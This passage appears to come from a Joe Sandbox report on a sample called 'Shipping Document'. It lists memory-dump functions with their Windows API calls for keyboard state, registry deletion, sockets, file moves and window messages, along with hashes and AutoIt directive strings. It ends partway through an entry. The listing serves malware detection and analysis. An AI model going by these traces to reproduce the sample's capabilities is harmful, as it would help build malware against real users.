Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 0fbfa011cccefa9d588fcfe196bb145be3e97b075fe77a579c27b2decf8287ae
Instruction ID: c419759055dc6bf615656a4da87e47797c8eb0cd25d8dc6a31fe244dfe675aeb
Opcode Fuzzy Hash: 0fbfa011cccefa9d588fcfe196bb145be3e97b075fe77a579c27b2decf8287ae
Instruction Fuzzy Hash: C461C075E0061ADFCB14EF54C985AAEBBF4FF88310B14805DE88AAB351CB34AD40CB90

Function 0102145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0102149C
GetKeyboardState.USER32(?), ref: 010214B1
SetKeyboardState.USER32(?), ref: 01021512
PostMessageW.USER32(?,00000101,00000010,?), ref: 01021540
PostMessageW.USER32(?,00000101,00000011,?), ref: 0102155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 010215A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 010215C8

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7d2ec55a8b7697a9e60233923e1377b11c892661d827287dda885068ebcd5532
Instruction ID: 98e9f08d12e6e0fb1a687d0404f8a981c7188d50ac4b06f1f30cd9aa5d6c3e64
Opcode Fuzzy Hash: 7d2ec55a8b7697a9e60233923e1377b11c892661d827287dda885068ebcd5532
Instruction Fuzzy Hash: 9151C2B0A047F67EFB3646388C45BBA7EE96F06304F0C45C9E2D9558C2D7B99884D750

Function 01021276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 010212B5
GetKeyboardState.USER32(?), ref: 010212CA
SetKeyboardState.USER32(?), ref: 0102132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01021357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01021374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 010213B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 010213D9

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 3bf59876728719ccaa536d7c0b469f2c8ccd472afe11852a3f69d431d8a29a70
Instruction ID: aee6b1df716302bb2af0cce2df254e05e2ff76b88c78311742cdc6a481be859d
Opcode Fuzzy Hash: 3bf59876728719ccaa536d7c0b469f2c8ccd472afe11852a3f69d431d8a29a70
Instruction Fuzzy Hash: 1151D8B05047E63DFB3286288C55BBA7FEA6F06304F0885C9E2D8568C2D7B5A898D750

Function 0102589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 010258AC
_wcsncpy.LIBCMT ref: 010258E1
_wcsncpy.LIBCMT ref: 01025913
_wcsncpy.LIBCMT ref: 01025946
_wcsncpy.LIBCMT ref: 01025988
_wcsncpy.LIBCMT ref: 010259C2
_wcsncpy.LIBCMT ref: 010259F1

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 95b959342bbfde12c382186f302d1910bfcc6e89dfb39920e5dc930bfba85bc5
Instruction ID: 7905e644cd0193bb75c4ceebf2fb65eb373e573021e3b74e1990ecb37fbde907
Opcode Fuzzy Hash: 95b959342bbfde12c382186f302d1910bfcc6e89dfb39920e5dc930bfba85bc5
Instruction Fuzzy Hash: F741A5A5C2026876CB51EBB58C8B9CFB7ACAF05310F508466F658E3111F738E714D7AA

Function 010238AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 010248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,010238D3,?), ref: 010248C7

Part of subcall function 010248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,010238D3,?), ref: 010248E0

lstrcmpiW.KERNEL32(?,?), ref: 010238F3
_wcscmp.LIBCMT ref: 0102390F
MoveFileW.KERNEL32(?,?), ref: 01023927
_wcscat.LIBCMT ref: 0102396F
SHFileOperationW.SHELL32(?), ref: 010239DB

Strings

\*.*, xrefs: 01023969

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 7623de0b47f164bd1bd217732442ea1dac5ca6865c3ca65cf29c398f1be03b41
Instruction ID: 0e90084cbf2e12a211a93a3a99862f695b6319c361996b701469c9635b2cff97
Opcode Fuzzy Hash: 7623de0b47f164bd1bd217732442ea1dac5ca6865c3ca65cf29c398f1be03b41
Instruction Fuzzy Hash: 754181B16083959AC791EF68C881ADFB7ECBF89340F00096EF5C9C7151EA39D248C752

Function 01047500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01047519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010475C0
IsMenu.USER32(?), ref: 010475D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01047620
DrawMenuBar.USER32 ref: 01047633

Strings

0, xrefs: 0104750D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 5226639ed959ace99133718c2c9e5af8d5aa744a2afc0f8c2317472e1bd94ea4
Instruction ID: cd4f245f1141f5a813ac52be0910837bb36f0a6d5688ca37930d55fcf38ce715
Opcode Fuzzy Hash: 5226639ed959ace99133718c2c9e5af8d5aa744a2afc0f8c2317472e1bd94ea4
Instruction Fuzzy Hash: 15411AB5A00249EFDB20DF58D9C4E9ABBF9FF08314F048169EE959B250D735A950CF90

Function 0104122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0104125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01041286
FreeLibrary.KERNEL32(00000000), ref: 0104133D

Part of subcall function 0104122D: RegCloseKey.ADVAPI32(?), ref: 010412A3
Part of subcall function 0104122D: FreeLibrary.KERNEL32(?), ref: 010412F5
Part of subcall function 0104122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01041318

RegDeleteKeyW.ADVAPI32(?,?), ref: 010412E0

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: adf0140bff9599ea61fcfd01762e1ab47c86faa532b1cfa17590747fceb0dc33
Instruction ID: 5f97be1ffdd2702bb17c003ef8a6089432ca8d16d325f72dd464003556558c79
Opcode Fuzzy Hash: adf0140bff9599ea61fcfd01762e1ab47c86faa532b1cfa17590747fceb0dc33
Instruction Fuzzy Hash: 35314FF5901119BFEB159B94D9C5EFEB7BCEF08300F0041A9E591E2140DA756A859BA0

Function 0104653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0104655B
GetWindowLongW.USER32(011D5DD8,000000F0), ref: 0104658E
GetWindowLongW.USER32(011D5DD8,000000F0), ref: 010465C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 010465F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0104661F
GetWindowLongW.USER32(00000000,000000F0), ref: 01046630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0104664A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 86eaa37a7be65ad250b88d3ba86129b2deacd357e84658f742a361a2d3fbdb05
Instruction ID: 66bdcedb550671b26e9638524d95a22a308d304d1fee8bda5a7ece15d425a8ae
Opcode Fuzzy Hash: 86eaa37a7be65ad250b88d3ba86129b2deacd357e84658f742a361a2d3fbdb05
Instruction Fuzzy Hash: 513119B4604111AFDB31DF6CE8C4F593BE1FB4A750F1902A4F5858B2AADB77A840CB81

Function 01036486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 010380A0: inet_addr.WSOCK32(00000000), ref: 010380CB

socket.WSOCK32(00000002,00000001,00000006), ref: 010364D9
WSAGetLastError.WSOCK32(00000000), ref: 010364E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01036521
connect.WSOCK32(00000000,?,00000010), ref: 0103652A
WSAGetLastError.WSOCK32 ref: 01036534
closesocket.WSOCK32(00000000), ref: 0103655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01036576

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 89263313823b6982da013a44ff32f4e7c15b63746d8506130e786acb4a0df3d1
Instruction ID: 4f4e49af2035a04d6312d255add8cd40887a5a66971ebfc6abf711ce6893f56d
Opcode Fuzzy Hash: 89263313823b6982da013a44ff32f4e7c15b63746d8506130e786acb4a0df3d1
Instruction Fuzzy Hash: 8631B575600119AFEB109F18DD85FBE7BEDEB84714F00806DF989DB281DB79A904CB61

Function 0101E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0101E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0101E120
SysAllocString.OLEAUT32(00000000), ref: 0101E123
SysAllocString.OLEAUT32 ref: 0101E144
SysFreeString.OLEAUT32 ref: 0101E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 0101E167
SysAllocString.OLEAUT32(?), ref: 0101E175

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 56799e944bfb1ec9df35a9f392adf9ad33a5d91c02de1d9cee12da8721714a2d
Instruction ID: fb6076b036189ca195d136db9a7d7defa998d0c204093788aafc8ca76b0063c5
Opcode Fuzzy Hash: 56799e944bfb1ec9df35a9f392adf9ad33a5d91c02de1d9cee12da8721714a2d
Instruction Fuzzy Hash: 2821A776600109AFDB21AFACDC88CAF77ECEB09760B408165FD95CB259DE79DC418B60

Function 0101FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0101FB81
__wcsnicmp.LIBCMT ref: 0101FBA2
__wcsnicmp.LIBCMT ref: 0101FBBC

Strings

#OnAutoItStartRegister, xrefs: 0101FBB6
#notrayicon, xrefs: 0101FB79
#requireadmin, xrefs: 0101FB9C

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 1610af26b24b9e834ce9a36242748c9f068749600a3c281c7c36af31e9ddf50c
Instruction ID: 9fb8fbc3b2552855590963b2e8c0c5866bb77d8de4ed3b3bcc883f1ce33781da
Opcode Fuzzy Hash: 1610af26b24b9e834ce9a36242748c9f068749600a3c281c7c36af31e9ddf50c
Instruction Fuzzy Hash: 8A217CB2104253A6D331B6399E52FAB73D8FF05344F04402AFEC687146E79CA985E3A1

Function 0104783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FC1D73
Part of subcall function 00FC1D35: GetStockObject.GDI32(00000011), ref: 00FC1D87
Part of subcall function 00FC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FC1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 010478A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 010478AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 010478B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 010478C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 010478D4

Strings

Msctls_Progress32, xrefs: 01047872

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 3febb89ce44718102afcc7f349c2f1d706e20caa7b30c34cf2796e22b51dd708
Instruction ID: f175a384b5db5b5a624edd211b36d34e8d41525399b9a8d7dbcde957629200d8
Opcode Fuzzy Hash: 3febb89ce44718102afcc7f349c2f1d706e20caa7b30c34cf2796e22b51dd708
Instruction Fuzzy Hash: A01193B155011ABFFF159E64CC85EEB7F6DEF08798F014129B644A6050C7729C21DBA4

Function 00FE41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FE4292,?), ref: 00FE41E3
GetProcAddress.KERNEL32(00000000), ref: 00FE41EA
EncodePointer.KERNEL32(00000000), ref: 00FE41F6
DecodePointer.KERNEL32(00000001,00FE4292,?), ref: 00FE4213

Strings

combase.dll, xrefs: 00FE41DE
RoInitialize, xrefs: 00FE41D2

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: abce1ab908f0a5e2ba47f179ed56df646c18968441434528892b9ed581cf3972
Instruction ID: 183ea7576ebee70fb2909a08b472208188f64f68cac8384bc3254cb06fcf2e4e
Opcode Fuzzy Hash: abce1ab908f0a5e2ba47f179ed56df646c18968441434528892b9ed581cf3972
Instruction Fuzzy Hash: 97E012F4E90342AFEF306B75ED49B093595BB11743F508428B9D1D9088D7BF50519F10

Function 00FE429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FE41B8), ref: 00FE42B8
GetProcAddress.KERNEL32(00000000), ref: 00FE42BF
EncodePointer.KERNEL32(00000000), ref: 00FE42CA
DecodePointer.KERNEL32(00FE41B8), ref: 00FE42E5

Strings

combase.dll, xrefs: 00FE42B3
RoUninitialize, xrefs: 00FE42A7

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 60724c58d8a832416ea83fa475050ffcce40a03856c3a9c353ec3736597bff20
Instruction ID: c7b05fe3c179ec0f2399b36e4b7fa40f45689c4c077f696141dd7c674fbdb496
Opcode Fuzzy Hash: 60724c58d8a832416ea83fa475050ffcce40a03856c3a9c353ec3736597bff20
Instruction Fuzzy Hash: 09E0BFBCA45302EBEF70AF65EE4DB093AA4BB14B46F104018F9C1D5048DB7E5500DB14

Function 0102675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 010268AD
_memmove.LIBCMT ref: 010267E8

Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C

_memmove.LIBCMT ref: 0102685B
_memmove.LIBCMT ref: 01026942
_memmove.LIBCMT ref: 0102695B
_memmove.LIBCMT ref: 01026977

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 03b96fe320414c51c1165a25205fb8119775fc53f4435a157207cad85c62af19
Instruction ID: 0984039e8a2f08311dc191abf85b8631f5d16122ba368d798a310a060e7b8aeb
Opcode Fuzzy Hash: 03b96fe320414c51c1165a25205fb8119775fc53f4435a157207cad85c62af19
Instruction Fuzzy Hash: A661FF305042AAABDF11EF21CD82FFE3BA8AF44308F044158FD895B292DF79A901DB50

Function 0104046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

Part of subcall function 010410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01040038,?,?), ref: 010410BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01040548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01040588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 010405AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 010405D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 01040617
RegCloseKey.ADVAPI32(00000000), ref: 01040624

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 5b6cc1124c530c9d8a6daf2fe077c353e89abab99125e88db65497558a246a07
Instruction ID: c2338fec294e8d267dd3943b2b4b0db43831e35dff6f81c24a23af2b0e5b8e93
Opcode Fuzzy Hash: 5b6cc1124c530c9d8a6daf2fe077c353e89abab99125e88db65497558a246a07
Instruction Fuzzy Hash: DF516971108241AFD710EB28CD85EAFBBE8FF88704F04496DF68597291DB76E904DB92

Function 01045A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 01045A82
GetMenuItemCount.USER32(00000000), ref: 01045AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 01045AE1
GetMenuItemID.USER32(?,?), ref: 01045B50
GetSubMenu.USER32(?,?), ref: 01045B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 01045BAF

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
